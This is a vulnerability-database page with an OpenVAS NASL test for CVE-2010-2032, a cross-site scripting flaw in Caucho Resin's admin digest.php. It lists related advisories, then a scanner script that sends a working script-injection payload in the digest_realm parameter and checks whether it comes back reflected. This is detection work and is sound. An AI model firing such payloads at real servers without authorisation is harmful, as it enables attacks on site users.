| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2010-2032 | 24 May 201019:30 | – | attackerkb | |
| CVE-2010-2032 | 19 May 201000:00 | – | circl | |
| CVE-2010-2032 | 24 May 201019:00 | – | cve | |
| CVE-2010-2032 | 24 May 201019:00 | – | cvelist | |
| EUVD-2010-2052 | 7 Oct 202500:30 | – | euvd | |
| CVE-2010-2032 | 24 May 201019:30 | – | nvd | |
| Caucho Resin < 4.0.7 Multiple XSS Vulnerabilities - Active Check | 28 May 201000:00 | – | openvas | |
| Cross site scripting | 24 May 201019:30 | – | prion | |
| Resin resin-admin/digest.php XSS | 21 May 201000:00 | – | nessus | |
| Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabili | 31 Aug 201500:00 | – | seebug |
| Source | Link |
|---|---|
| secunia | www.secunia.com/advisories/39839 |
| securityfocus | www.securityfocus.com/archive/1/511341 |
| packetstormsecurity | www.packetstormsecurity.org/1005-exploits/cauchoresin312-xss.txt |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_caucho_resin_mult_xss_vuln.nasl 5394 2017-02-22 09:22:42Z teissa $
#
# Caucho Resin Multiple Cross-Site Scripting Vulnerabilities
#
# Authors:
# Sooraj KS <[email protected]>
#
# Copyright:
# Copyright (c) 2010 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow attackers to execute arbitrary web
script or HTML in a user's browser session in the context of an affected
site.
Impact Level: Application";
tag_affected = "Caucho Technology Resin Professional 3.1.5, 3.1.10 and 4.0.6.";
tag_insight = "The flaw is caused by improper validation of user-supplied input via the
'digest_username' and 'digest_realm' parameters in resin-admin/digest.php
that allows the attackers to insert arbitrary HTML and script code.";
tag_solution = "Upgrade to the latest version of Caucho Technology Resin Professional 4.0.7:
http://www.caucho.com/download";
tag_summary = "The host is running Caucho Resin and is prone to multiple
cross-site scripting vulnerabilities.";
if(description)
{
script_id(901115);
script_version("$Revision: 5394 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-05-28 16:52:49 +0200 (Fri, 28 May 2010)");
script_bugtraq_id(40251);
script_cve_id("CVE-2010-2032");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_name("Caucho Resin Multiple Cross-Site Scripting Vulnerabilities");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2010 SecPod");
script_family("Web application abuses");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://secunia.com/advisories/39839");
script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/511341");
script_xref(name : "URL" , value : "http://packetstormsecurity.org/1005-exploits/cauchoresin312-xss.txt");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
## Get HTTP Port
port = get_http_port(default:8080);
if(!port){
exit(0);
}
## Send and Receive the response
req = http_get(item:"/resin-admin/", port:port);
res = http_keepalive_send_recv(port:port,data:req);
## Confirm the application
if('>Resin Admin Login<' >< res)
{
## Try XSS attack and check the response to confirm vulnerability.
if(http_vuln_check(port:port, url:'/resin-admin/digest.php?'+
'digest_attempt=1&digest_realm="><script>alert'+
"('OpenVAS-XSS-Test')</script><a&digest_username[]=",
pattern:"<script>alert\('OpenVAS-XSS-Test'\)</script>", check_header:TRUE)) {
security_message(port:port);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation